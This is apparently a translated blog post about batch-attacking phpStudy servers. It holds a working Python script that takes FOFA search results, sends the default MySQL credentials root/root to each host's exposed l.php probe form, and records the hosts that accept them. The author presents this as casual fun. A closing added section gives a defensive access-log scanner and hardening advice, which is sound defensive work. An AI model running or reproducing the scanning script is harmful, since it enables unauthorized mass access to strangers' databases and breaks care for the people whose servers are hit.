Python + FOFA: batch-hitting phpStudy


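Search FOFA for "phpStudy探针 2014" and use the FOFA API to pull all of the results. There is nothing technically sophisticated here, it is just for fun. Most of the hosts on the later result pages have already been shut down, so only a few are actually usable.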

import json

import requests


def get_target():
	# Build the probe-page URLs from the saved FOFA API results (JSON).
	url_list = []
	with open("fofa_phpstudy_info.txt", "r") as f:
		target = json.loads(f.read())

	for strvar in target:
		for strvar2 in target[strvar]:
			# strvar2[1] and strvar2[2] are used as host and port
			url = "http://" + strvar2[1] + ":" + strvar2[2] + "/l.php#button"
			url_list.append(url)
	return url_list


url_list = get_target()

for php_url in url_list:
	header = {
		"Content-Type": "application/x-www-form-urlencoded"
	}
	# Form fields of the probe page's MySQL connection test
	data = {
		"host": "localhost",
		"port": "3306",
		"login": "root",
		"password": "root",
		"act": "MySQL检测"
	}
	try:
		res = requests.post(php_url, headers=header, data=data)

		# The probe page prints this marker when the MySQL connection succeeds
		if "连接到MySql数据库正常" in res.text:
			print(php_url, ":", "phpmyadmin登录成功, 账号root, 密码root")
			with open("phpstudy_ok.txt", "a") as f:
				f.write(php_url + "|root|root\n")
		else:
			print(php_url, "phpmyadmin登录失败")
	except requests.RequestException:
		# Connection error
		print(php_url, "链接异常")

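The fetched data is concatenated into URLs. The test goes through the front-end phpinfo (probe) page, which exposes a MySQL connection test interface.

Then capture the request to get the required fields and build the same submission in Python. Nothing difficult, just playing around.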
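Seen from the server side, the request above is a POST to l.php, which stands out in an access log. The following is an added example, not part of the original post: it scans logs in combined log format for such requests and groups them by client IP. The sample log lines are constructed, and the helper names are hypothetical.

```python
import re
from collections import defaultdict

# Combined log format: ip - - [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2021:10:01:02 +0800] "GET /l.php HTTP/1.1" 200 14210 "-" "python-requests/2.25.1"
203.0.113.7 - - [12/Mar/2021:10:01:03 +0800] "POST /l.php HTTP/1.1" 200 14388 "-" "python-requests/2.25.1"
198.51.100.20 - - [12/Mar/2021:10:05:00 +0800] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2021:10:07:41 +0800] "POST /L.PHP?x=1 HTTP/1.1" 200 14388 "-" "curl/7.68.0"
192.0.2.44 - - [12/Mar/2021:10:09:13 +0800] "POST /l.php HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
garbage line that does not parse
"""

def is_probe_path(path):
    """True if the path (query string and fragment ignored) is the probe page l.php."""
    name = path.split("?", 1)[0].split("#", 1)[0].rsplit("/", 1)[-1]
    return name.lower() == "l.php"  # Windows hosts serve paths case-insensitively

def find_probe_posts(log_text):
    """Group POSTs to l.php by client IP as (time, status) tuples."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not is_probe_path(m["path"]):
            continue  # unparsable line, other method, or other page
        hits[m["ip"]].append((m["time"], int(m["status"])))
    return dict(hits)

def exposed(hits):
    """Client IPs that got a 200 back, i.e. reached a live MySQL test form."""
    return sorted(ip for ip, reqs in hits.items() if any(s == 200 for _, s in reqs))

if __name__ == "__main__":
    found = find_probe_posts(SAMPLE_LOG)
    for ip, reqs in found.items():
        print(ip, reqs)
    print("probe form served to:", exposed(found))
```

Any 200 response here means l.php is still deployed; removing it from the web root and changing the MySQL root password closes what the script tests for.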